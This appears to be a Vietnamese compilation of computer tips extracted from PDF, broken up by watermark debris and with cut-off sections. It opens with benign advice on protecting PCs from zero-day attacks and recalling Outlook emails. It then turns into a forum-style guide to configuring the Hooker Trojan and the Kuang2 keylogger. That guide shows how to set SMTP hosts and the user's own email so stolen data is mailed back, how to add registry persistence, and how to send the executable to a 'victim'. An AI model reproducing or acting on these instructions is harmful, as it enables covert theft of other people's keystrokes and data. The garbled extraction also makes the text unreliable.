trong danh sách Safe Sender, cũng như vô tình có những thuộc tính nào đó tương đồng với đặc điểm
nhận dạng thư rác của Junk Email.

Song Đặng

Bảo vệ PC khi chưa có bản vá Thực hiện: Nguyễn Lê

Kẽ hở ngày zero (zero-day) tạo nên tình trạng dễ bị tấn công của phần mềm mà nhà sản xuất chưa kịp
vá lỗi. Tuy nhiên vẫn có cách giữ an toàn cho máy tính của bạn trong thời gian "trống" này.

1. Từ bỏ Internet Explorer 6. Một trong những hành động tốt nhất mà bạn có thể làm để cải thiện độ
an toàn khi lướt web là tống khứ trình duyệt đầy lỗi tai tiếng của Microsoft. Dĩ nhiên, không có
chương trình nào tuyệt đối an toàn; nhưng IE 6 dễ bị tấn công hoặc vì bản thân nó vốn "ốm yếu", hoặc
vì có số lượng người dùng đông đảo nên trở thành mục tiêu hấp dẫn. Hãy nâng cấp lên IE 7 hay dùng
trình duyệt khác thay thế như Firefox hay
Opera.
2. Thử các chương trình khác thay thế cho
những mục tiêu thường bị tấn công zero-day.
Chẳng hạn dùng chương trình Foxit thay cho
Adobe Reader và OpenOffice thay cho MS
Office.
3. Thiết lập chế độ cập nhật tự động cho
Windows và các chương trình khác khi có
thể. Các lỗi nghiêm trọng thường vẫn là mục
tiêu tấn công ngay cả sau khi đã có bản vá, do
tin tặc biết nhiều người không thèm vá lỗi. Để kiểm tra và thay đổi thiết lập Windows Update, nhấn
Automatic Updates trong Control Panel. Để hệ thống luôn cập nhật, bạn nên chọn Download updates
for me, but let me choose when to install them.

w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

firewall của Windows XP có được kích hoạt
hay chưa, vào Control Panel, mở Security
Center và nhấn liên kết Windows Firewall.
Hầu hết router băng rộng đều có chức năng
firewall.

6. Sử dụng chương trình ngăn chặn như
DropMyRights để bổ trợ phần mềm chống
virus hay bảo mật. Hiện có nhiều công cụ tiện
ích, cả miễn phí và có phí, thay đổi cách thức
vận hành các chương trình dễ bị tấn công để
giới hạn vùng ảnh hưởng nếu xảy ra tấn công zero-day.

7. Cập nhật thông tin. Trang chuyên đề "Bảo mật" của Thế Giới Vi Tính Online cung cấp tin tức mới
nhất về các mối đe dọa bảo mật, các hướng dẫn an toàn và các bài nhận xét về sản phẩm bảo mật.
Ngoài ra còn có các nguồn thông tin tốt khác như website eEye Zero-Day Tracker (research.eeye.com)
và blog Security Fix (

Nguyễn Lê
PC World Mỹ 04/2007

Thu hồi Email đã gởi trong MS Outlook

Có lúc nào đó bạn đã gởi đi một Email nhưng bất chợt "thôi chết rồi gởi lộn
địa chỉ rồi" và bạn muốn lấy lại email đó. Nếu bạn sử dụng Microsoft
Outlook hãy làm theo cách này :

1. Vào Sent Items
2. Chọn cái mail mà bạn đã gởi nhầm (click vào nó)
3. Trong cái cửa sổ của mail đó bạn vào Action trên thanh Menu và chọn

w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a

1.Đầu tiên là con Trojan Hooker
Sau khi bạn tải con này về ,các bạn chạy tập tin Hkconf.ini các bạn
đặt thuộc tính cho
file này như sau
Số 1 là đặt thuộc tính enable cho tính chất đó
Số 0 là đặt thụôc tính disable cho tính chất đó

kill = 1 ;kill itself?
Ví dụ nếu bạn chọn kill=1 thì nó sẽ tự kill nó,còn nếu chọn 0 thì nó
sẽ không tự kill nó

Nhưng mấy cái dó không quan trọng cái quan trọng là phần host đây
là cai server
mà thông qua đó con Trojan đó sẻ gửi thư về cho ta

sendmail host
host=mx4.mail.yahoo.com Phần host= bạn có thể cho nó bằng các Host tôi đưa ra đây (không
biết có cái nào không còn họat động không nữa , vì mấy cái này họat
động bất thường lằm ,lâu rồi tôi chưa thử nên không biêt ,nếu anh
em ai biết cái nào còn họat động tốt thì Post lên cho anh em xài)

SMTP đây :
mx2.mail.yahoo.com
hoac mx4.mail.yahoo.com
hoac mta45.mail.yahoo.com
hoac hcm-mail-prepaid.vnn.vn==> tot day
hoac mta-v13.level3.mail.yahoo.com

o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e
w

mailto - your email
mailto=bạn diền dịa chỉ của bạn vào chỗ này
Thư của bạn được gủi về hộp thư của bạn với chủ đề

subject of message
subj=đây là chủ dề mà bạn sẽ nhận dược khi con Trojan gửi thư về
cho bạn

name of exec
exename=hsys.exe ===> dây là tập tin mà con Trojan sẽ chạy ngay
trong máy của Victim
Bạn cũng có thể dổi tên tập tin này

reg_path=
====>đây là hướng dẫn dễ con trojan ghi tên nó vào Registry để
mỗi lần khởi động máy thì nó tự động chạy ===>bạn cũng có thể
thay đỗi hướng dẫn

À Quên một cái cũng rất là quan trọng ,là nếu ở dòng cuối cũng của
file Hkconf.ini nếu ở trên là dòng
S5 thì bạn thêm vào dòng cuối cùng là S6=logon còn nếu là dòng
trên là S12 th2i bạn thêm vào S13=logon

Xong bạn save file Hkconf.ini này lại rồi chạy file config.bat ,xong bạn
gửi file hooker.exe
cho victim đi là xong
Nói chung phần này không khó các bạn có thể tự đọc và làm lấy ,dể
tôi chuyển sang các con khác
Click to buy NOW!
P

k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e
w
e
r
w
w
w
.
d
o

bạn chạy
file K2as_sự.exe hiện ra một giao diện nhập vào nút Open chọn file
K2logas và mở
file nảy ra
bạn điện những thu cần thiết vào(smtp,email như tôi đã nói ở trên)
phần source address bạn điện địa chỉ nào cũng được
Con phần bên phải là các thiết lập tuy bạn chọn để con này sẽ gửi về
cho bạn những
gì bạn yêu cầu như có lưu phím mở rộng hay là để thời gian máy
ngày con trojan gửi thư
về cho bạn
Nói chung bạn đánh dấu chọn hết cho chắc ăn
xong bạn save lại và gửi file K2logas cho victim là xong

4.Con Kuang2 cũng sử dụng giống như con Kuang2keyloggeras mà
thôi 5.Bây giờ tới nơi đến con Keylog:===> à mà con này hình như bác
người_dân_đường_hanoi đã nói nhiều
Click to buy NOW!
P
D
F
-
X
C
h
a
n

F
-
X
C
h
a
n
g
e

V
i
e
w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k